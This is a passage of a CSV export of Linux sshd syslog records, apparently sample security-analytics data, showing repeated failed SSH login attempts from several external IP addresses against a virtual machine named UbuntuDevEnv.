+532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:58,UbuntuDevEnv,2019-06-26 17:47:58,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 64614:11: Bye Bye [preauth],54644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,64614,,
+533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:58,UbuntuDevEnv,2019-06-26 17:47:58,auth,UbuntuDevEnv,info,Disconnected from invalid user openproject 58.87.109.107 port 64614 [preauth],54644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,openproject,58.87.109.1,64614,,
+534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:48:41,UbuntuDevEnv,2019-06-26 17:48:41,auth,UbuntuDevEnv,info,Invalid user clamav from 54.37.66.73 port 48864,54807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav,54.37.66.7,48864,,
+535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:48:41,UbuntuDevEnv,2019-06-26 17:48:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:48:41,UbuntuDevEnv,2019-06-26 17:48:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,54807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:48:43,UbuntuDevEnv,2019-06-26 17:48:43,auth,UbuntuDevEnv,info,Failed password for invalid user clamav from 54.37.66.73 port 48864 ssh2,54807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav,54.37.66.7,48864,,
+538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:48:43,UbuntuDevEnv,2019-06-26 17:48:43,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 48864:11: Bye Bye [preauth],54807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,48864,,
+539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:48:43,UbuntuDevEnv,2019-06-26 17:48:43,auth,UbuntuDevEnv,info,Disconnected from invalid user clamav 54.37.66.73 port 48864 [preauth],54807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav,54.37.66.7,48864,,
+540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:08,UbuntuDevEnv,2019-06-26 17:49:07,auth,UbuntuDevEnv,info,Invalid user sistema from 157.230.190.1 port 32838,54900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sistema,157.230.190.1,32838,,
+541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:08,UbuntuDevEnv,2019-06-26 17:49:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:08,UbuntuDevEnv,2019-06-26 17:49:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,54900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:10,UbuntuDevEnv,2019-06-26 17:49:10,auth,UbuntuDevEnv,info,Failed password for invalid user sistema from 157.230.190.1 port 32838 ssh2,54900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sistema,157.230.190.1,32838,,
+544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:10,UbuntuDevEnv,2019-06-26 17:49:10,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 32838:11: Bye Bye [preauth],54900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,32838,,
+545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:10,UbuntuDevEnv,2019-06-26 17:49:10,auth,UbuntuDevEnv,info,Disconnected from invalid user sistema 157.230.190.1 port 32838 [preauth],54900,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sistema,157.230.190.1,32838,,
+546,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:19,UbuntuDevEnv,2019-06-26 17:49:19,auth,UbuntuDevEnv,info,Invalid user brc from 58.87.109.107 port 15923,54938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,brc,58.87.109.1,15923,,
+547,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:19,UbuntuDevEnv,2019-06-26 17:49:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+548,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:19,UbuntuDevEnv,2019-06-26 17:49:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,54938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+549,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:21,UbuntuDevEnv,2019-06-26 17:49:21,auth,UbuntuDevEnv,info,Invalid user riak from 111.230.29.17 port 33268,54950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,riak,111.230.29.1,33268,,
+550,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:21,UbuntuDevEnv,2019-06-26 17:49:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+551,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:21,UbuntuDevEnv,2019-06-26 17:49:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,54950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+552,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:21,UbuntuDevEnv,2019-06-26 17:49:21,auth,UbuntuDevEnv,info,Failed password for invalid user brc from 58.87.109.107 port 15923 ssh2,54938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,brc,58.87.109.1,15923,,
+553,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:22,UbuntuDevEnv,2019-06-26 17:49:21,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 15923:11: Bye Bye [preauth],54938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,15923,,
+554,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:22,UbuntuDevEnv,2019-06-26 17:49:21,auth,UbuntuDevEnv,info,Disconnected from invalid user brc 58.87.109.107 port 15923 [preauth],54938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,brc,58.87.109.1,15923,,
+555,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:23,UbuntuDevEnv,2019-06-26 17:49:22,auth,UbuntuDevEnv,info,Failed password for invalid user riak from 111.230.29.17 port 33268 ssh2,54950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,riak,111.230.29.1,33268,,
+556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:24,UbuntuDevEnv,2019-06-26 17:49:23,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 33268:11: Bye Bye [preauth],54950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,33268,,
+557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:24,UbuntuDevEnv,2019-06-26 17:49:23,auth,UbuntuDevEnv,info,Disconnected from invalid user riak 111.230.29.17 port 33268 [preauth],54950,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,riak,111.230.29.1,33268,,
+558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:44,UbuntuDevEnv,2019-06-26 17:49:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237  user=test,55027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,107.175.127.2,,0,
+559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:46,UbuntuDevEnv,2019-06-26 17:49:46,auth,UbuntuDevEnv,info,Failed password for test from 107.175.127.237 port 52446 ssh2,55027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,52446,,
+560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:47,UbuntuDevEnv,2019-06-26 17:49:46,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 107.175.127.237 port 52446 [preauth],55027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,107.175.127.2,52446,,
+561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:49:47,UbuntuDevEnv,2019-06-26 17:49:46,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 52446:11: Bye Bye [preauth],55027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,52446,,
+562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:06,UbuntuDevEnv,2019-06-26 17:50:06,auth,UbuntuDevEnv,info,Invalid user francesco from 54.37.66.73 port 57469,55120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,francesco,54.37.66.7,57469,,
+563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:06,UbuntuDevEnv,2019-06-26 17:50:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:06,UbuntuDevEnv,2019-06-26 17:50:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,55120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:08,UbuntuDevEnv,2019-06-26 17:50:08,auth,UbuntuDevEnv,info,Failed password for invalid user francesco from 54.37.66.73 port 57469 ssh2,55120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,francesco,54.37.66.7,57469,,
+566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:08,UbuntuDevEnv,2019-06-26 17:50:08,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 57469:11: Bye Bye [preauth],55120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,57469,,
+567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:50:08,UbuntuDevEnv,2019-06-26 17:50:08,auth,UbuntuDevEnv,info,Disconnected from invalid user francesco 54.37.66.73 port 57469 [preauth],55120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,francesco,54.37.66.7,57469,,
+568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:35,UbuntuDevEnv,2019-06-26 17:52:34,auth,UbuntuDevEnv,info,Invalid user nian from 157.230.190.1 port 37742,55731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nian,157.230.190.1,37742,,
+569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:35,UbuntuDevEnv,2019-06-26 17:52:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:35,UbuntuDevEnv,2019-06-26 17:52:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,55731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:37,UbuntuDevEnv,2019-06-26 17:52:37,auth,UbuntuDevEnv,info,Failed password for invalid user nian from 157.230.190.1 port 37742 ssh2,55731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nian,157.230.190.1,37742,,
+572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:37,UbuntuDevEnv,2019-06-26 17:52:37,auth,UbuntuDevEnv,info,Disconnected from invalid user nian 157.230.190.1 port 37742 [preauth],55731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nian,157.230.190.1,37742,,
+573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:52:37,UbuntuDevEnv,2019-06-26 17:52:37,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 37742:11: Bye Bye [preauth],55731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,37742,,
+574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:53:09,UbuntuDevEnv,2019-06-26 17:53:08,auth,UbuntuDevEnv,info,Invalid user csgoserver from 54.37.66.73 port 46440,55858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,54.37.66.7,46440,,
+575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:53:09,UbuntuDevEnv,2019-06-26 17:53:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,55858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:53:09,UbuntuDevEnv,2019-06-26 17:53:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,55858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:53:11,UbuntuDevEnv,2019-06-26 17:53:11,auth,UbuntuDevEnv,info,Failed password for invalid user csgoserver from 54.37.66.73 port 46440 ssh2,55858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,54.37.66.7,46440,,
+578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:53:11,UbuntuDevEnv,2019-06-26 17:53:11,auth,UbuntuDevEnv,info,Disconnected from invalid user csgoserver 54.37.66.73 port 46440 [preauth],55858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgoserver,54.37.66.7,46440,,
+579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:53:11,UbuntuDevEnv,2019-06-26 17:53:11,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 46440:11: Bye Bye [preauth],55858,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,46440,,
+580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:53:40,UbuntuDevEnv,2019-06-26 17:53:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107  user=mysql,55964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysql,58.87.109.1,,0,
+581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:53:43,UbuntuDevEnv,2019-06-26 17:53:42,auth,UbuntuDevEnv,info,Failed password for mysql from 58.87.109.107 port 62755 ssh2,55964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,62755,,
+582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:53:43,UbuntuDevEnv,2019-06-26 17:53:43,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 62755:11: Bye Bye [preauth],55964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,62755,,
+583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:53:43,UbuntuDevEnv,2019-06-26 17:53:43,auth,UbuntuDevEnv,info,Disconnected from authenticating user mysql 58.87.109.107 port 62755 [preauth],55964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,mysql,58.87.109.1,62755,,
+584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:00,UbuntuDevEnv,2019-06-26 17:54:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=181.220.230.40  user=nobody,56032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nobody,181.220.230.4,,0,
+585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:02,UbuntuDevEnv,2019-06-26 17:54:01,auth,UbuntuDevEnv,info,Failed password for nobody from 181.220.230.40 port 24059 ssh2,56032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,181.220.230.4,24059,,
+586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:02,UbuntuDevEnv,2019-06-26 17:54:02,auth,UbuntuDevEnv,info,"Received disconnect from 181.220.230.40 port 24059:11: Normal Shutdown, Thank you for playing [preauth]",56032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,181.220.230.4,24059,,
+587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:02,UbuntuDevEnv,2019-06-26 17:54:02,auth,UbuntuDevEnv,info,Disconnected from authenticating user nobody 181.220.230.40 port 24059 [preauth],56032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,nobody,181.220.230.4,24059,,
+588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:17,UbuntuDevEnv,2019-06-26 17:54:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237  user=root,56097,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,107.175.127.2,,0,
+589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:19,UbuntuDevEnv,2019-06-26 17:54:19,auth,UbuntuDevEnv,info,Failed password for root from 107.175.127.237 port 58582 ssh2,56097,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,58582,,
+590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:19,UbuntuDevEnv,2019-06-26 17:54:19,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 58582:11: Bye Bye [preauth],56097,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,58582,,
+591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:54:19,UbuntuDevEnv,2019-06-26 17:54:19,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 107.175.127.237 port 58582 [preauth],56097,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,107.175.127.2,58582,,
